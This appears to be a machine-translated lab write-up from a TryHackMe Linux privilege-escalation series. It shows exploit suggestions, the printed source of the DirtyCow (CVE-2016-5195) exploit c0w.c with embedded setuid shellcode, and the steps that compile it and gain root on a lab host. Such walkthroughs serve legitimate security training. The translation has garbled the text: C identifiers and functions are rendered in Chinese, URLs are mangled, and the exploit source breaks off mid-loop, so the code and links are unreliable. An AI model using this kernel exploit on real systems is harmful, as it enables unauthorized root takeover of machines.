[CVE-2016-5195]使用内核利用来提高特权！ Tryhackme Linux Privesc写作第10部分

┌──(hacklab㉿hacklab)-[~/tryhackme/linuxprv] └─$ ssh user@10.10.175.49 130 ⨯ user@10.10.175.49's password: Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 The programs included with the Debian GNU/Linux系统是免费软件；在/usr/share/doc/*/版权所有的单个文件中描述了每个程序的确切分发术语。在适用法律允许的范围内，Debian GNU/Linux绝对没有保修。上次登录：星期五5月15日06:41:23 2020从192.168.1.125

user@debian：〜$ perl/home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl ###### linux exploit suggester 2 ######## ####当地内核http://www.securityfocus.com/bid/45408 [2] CAN_BCM CVE-2010-2959资料来源：http：//www.exploit-db.com/exploits/14814 [3] http://www.exploit-db.com/exploits/40616 [4] exploit_x cve-2018-14665来源：http：//www.exploit-db.com/exploits/45697 [5] http://www.exploit-db.com/exploits/17787 [6] half_nelson2 alt：econet cve-2010-3850来源：http：//wwwww.exploit-db.com/exploits/exploits/exploits/17787 http://www.exploit-db.com/exploits/17787 [8] MSR CVE-2013-0268来源：http：//www.exploit-db.com/exploits/27297 [9] http://www.exploit-db.com/exploits/15150 [10] http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c [12] RDS CVE-2010-2010-3904来源：http：///wwwwwww..exploit-compleoit-com/explo.com/exploits/exploits/exploits/15285 [13] 13] Reisis101010 http://www.exploit-db.com/exploits/12130 [14] Video4linux CVE-2010-3081来源：http：//www.exploit-db.com/exploits/15024

[3] dirty_cow CVE-2016-5195来源：http：//www.exploit-db.com/exploits/40616

user@debian：〜$ cat/home/user/tools/kernel-exploits/dirtycow/c0w.c/ * * * cve-2016-5195 *的ptrace_pokedata变体应使用RHEL 5＆6 * * * * $ gcc -pthread c0w.c -o c0w * $ ./c0w * DirtyCow root privilege escalation * Backing up /usr/bin/passwd.. to /tmp/bak * mmap fa65a000 * madvise 0 * ptrace 0 * $ /usr/bin/passwd * [root@server foo]# whoami * root * [root@server foo]# id * uid = 0（root）gid = 501（foo）组= 501（foo） * @kre80r */ #include<fcntl.h> ＃包括<pthread.h>＃包括<string.h>＃包括<stdio.h>＃包括<stdint.h>＃包括<sys/mman.h>＃包括<sys/stat.h>＃包括<sys/types.h>＃包括<sys/wait.h>＃包括<sys/ptrace.h>＃包括<unistd.h>int f; void *map; pid_t pid; pthread_t pth; struct Stat ST; //如果无权阅读char suid_binary [] =“/usr/bin/passwd”，请更改； / * * $ msfvenom -p linux/x64/exec cmd =/bin/bash prependSetuid = true -f elf | xxd -i */ unsigned char shell_code[] = { 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 }; unsigned int sc_len = 177; / * * $ msfvenom -p linux/x86/exec cmd =/bin/bash prependSetuid = true -f elf | xxd -i unsigned char shell_code[] = { 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03，0x00，0x01，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x00，0x54，0x54，0x54，0x80，0x80 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00, 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x10, 0x00, 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53, 0x89, 0xe1，0xCD，0x80}; unsigned int sc_len = 136; */ void *madvisethread（void *arg）{int i，c = 0; for（i = 0; i <2000000; i ++）c+= madvise（map，100，madv_dontneed）; printf（“ madvise％d \ n \ n”，c）; } int main(int argc,char *argv[]){ printf(" \n\ (___) \n\ (oo)_____/ \n\ @@ ` \\ \n\ \\ ____, /%s \n\ // // \n\ ^^ ^^ \n\ ", suid_binary); char *备份; printf（“ dirtycow root特权升级\ n”）; printf（“将％s备份到 /tmp /bak \ n”，suid_binary）; ASPRINTF（＆Backup，“ CP％S /TMP /BAK”，suid_binary）;系统（备份）; f =打开（suid_binary，o_rdonly）; FSTAT（F，＆ST）; map = mmap（null，st.st_size+sizeof（long），prot_read，map_private，f，0）; printf（“ mmap％x \ n \ n”，地图）; pid = fork（）; if（pid）{waitpid（pid，null，0）; int u，i，o，c = 0，l = sc_len;对于（i = 0; i <10000/l; i ++）for（o = 0; o

user@debian：〜$ gcc -pthread/home/user/tools/kernel-exploits/dirtycow/c0w.c-c0w.c -o c0w用户@debian：〜$ ./ c0w（_______） /usr/bin/passwd to/tmp/bak mmap 534b7000 madvise 0 ptrace 0

用户@debian：〜$/usr/bin/passwd root@debian：/home/user＃whoami root